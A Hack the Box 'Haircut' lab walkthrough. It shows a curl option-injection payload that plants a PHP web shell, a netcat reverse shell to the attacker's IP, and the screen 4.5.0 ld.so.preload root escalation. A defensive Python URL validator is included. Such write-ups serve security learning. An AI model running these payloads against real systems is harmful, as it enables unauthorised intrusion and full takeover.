Hack the Box – Haircut Walkthrough

Today we’re going to solve another CTF machine, “Haircut”. It is now a retired box and is accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP
  • IP Address: 10.10.10.24
  • Difficulty: Easy

Weakness

  • Curl Command
  • SUID Screen 4.5

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify what is running behind the IP address.

An intense TCP and UDP scan found only these two ports open, so the next step is to enumerate the running services.

Enumerate Directories

There are different tools for directory enumeration, but my favorite is DirBuster.

Using the lowercase medium wordlist we found an exposed.php file and an uploads directory.

Let’s take a look at exposed.php file.

There’s an input field where you can enter a URL and press Go. Let’s take a look at what it does.

Let’s take a look at the request and response in Burp Suite.

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

formurl=http://localhost/test.html&submit=Go

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 19:05:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1011

<html>
	<head>
		<title>Hairdresser checker</title>
	</head>
	<body>
	<form action='exposed.php' method='POST'>
		<span>
		<p>
		Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html
		</p>
		</span>
		<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
		<input type='submit' name='submit' value='Go' id='submit' />
	</form>
	<span>
		<p>Requesting Site...</p>  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   223  100   223    0     0   167k      0 --:--:-- --:--:-- --:--:--  217k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
	<img src='carrie.jpg'></img>
  </body>
</html>
	</span>
	</body>
</html>

We can tell that it is running the curl command because the response contains curl’s progress meter. The carrie.jpg picture also hints at curl, where it says CARRIE CURL.

We know what curl can do 🙂

Exploitation

We can use curl to write our shell into the uploads directory we found during directory enumeration.

Let’s create a PHP command shell, 1337.php:

1337.php

https://gist.github.com/sente/4dbb2b7bdda2647ba80b

Now we start a Python HTTP server so the target can fetch our 1337.php file through curl.

python -m SimpleHTTPServer

Now we have to place our shell inside the uploads directory. Since we know the default web root /var/www/html, let’s use curl’s -o parameter to write the file 1337.php into /var/www/html/uploads.

-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

formurl=-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php&submit=Go

Our PHP shell is now in the uploads directory.
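As an added defensive example (not the box’s exposed.php, whose source is not shown in this writeup), here is how the URL-fetch handler could be hardened: the input is validated as a single absolute http(s) URL, rejected if it starts with “-” or contains whitespace, and handed to curl as an argv list without a shell, after curl’s `--` end-of-options marker. It is written in Python for ease of testing; the same checks carry over to a PHP handler. The sample inputs are the form’s own example value and the injected payload from the request above.

```python
import re
import subprocess
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
URL_MAX_LEN = 2048


def validate_fetch_url(formurl):
    """Return formurl unchanged if it is one plain absolute http(s) URL.

    Raise ValueError otherwise. The checks target exactly what the vulnerable
    handler lacks: a value starting with '-' would be read as a curl option,
    and embedded whitespace is how a second argument (such as an -o output
    path) gets smuggled onto the command line.
    """
    if not isinstance(formurl, str) or not formurl or len(formurl) > URL_MAX_LEN:
        raise ValueError("url missing or too long")
    if formurl.startswith("-"):
        raise ValueError("url must not start with '-'")
    if re.search(r"[\s\x00-\x1f\x7f]", formurl):
        raise ValueError("url must not contain whitespace or control characters")
    parts = urlsplit(formurl)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("only absolute http(s) URLs with a host are accepted")
    # A host allowlist would be the next step against fetching internal targets.
    return formurl


def build_curl_argv(formurl):
    """Build the argv list for curl; the validated URL is its only URL."""
    url = validate_fetch_url(formurl)
    # No shell: the list goes straight to execve, so quoting tricks do nothing.
    # '--' is curl's end-of-options marker, so nothing after it is an option.
    return ["curl", "--silent", "--show-error", "--max-time", "10",
            "--proto", "=http,https", "--", url]


def fetch(formurl):
    """Run curl without a shell and return its stdout (raises on bad input)."""
    argv = build_curl_argv(formurl)
    return subprocess.run(argv, capture_output=True, text=True, timeout=15).stdout


if __name__ == "__main__":
    # Constructed sample inputs: the form's own example and the injected payload.
    for candidate in ("http://localhost/test.html",
                      "-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php"):
        try:
            print("accepted:", build_curl_argv(candidate))
        except ValueError as err:
            print("rejected:", repr(candidate), "->", err)
```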

Let’s access our shell through the browser or Burp.

Request 1337.php?cmd=ls

GET /uploads/1337.php?cmd=ls HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 20:24:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31

<pre>1337.php
bounce.jpg
</pre>

Now it’s time to get a proper reverse shell using netcat.

GET /uploads/1337.php?cmd=nc -e /bin/sh 10.10.14.4 1337 HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

And we got a shell.

Privilege Escalation

After getting user access, we usually move forward by running enumeration scripts that gather the information which can lead to root.

Before running scripts I do some manual research and testing, and this time I found an uncommon SUID file.

The first thing I did was run this command.

find / -perm -4000 2>/dev/null

It turned up the uncommon file /usr/bin/screen-4.5.0, which we don’t usually see. A Google search found an exploit for it.

GCC is broken on the target machine, so we have to compile the exploit locally.

Let’s compile.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Let’s upload the compiled programs to the target machine in /tmp.

Let’s move further.

www-data@haircut:/tmp$ cd /etc
cd /etc
www-data@haircut:/etc$ ls -la |grep ld
ls -la |grep ld
-rw-r--r--   1 root root   24939 May 19  2017 ld.so.cache
-rw-r--r--   1 root root      34 Jan 27  2016 ld.so.conf
drwxr-xr-x   2 root root    4096 May 16  2017 ld.so.conf.d
drwxr-xr-x   2 root root    4096 May 15  2017 ldap
www-data@haircut:/etc$ umask 000
umask 000
www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
<en -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
www-data@haircut:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@haircut:/etc$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
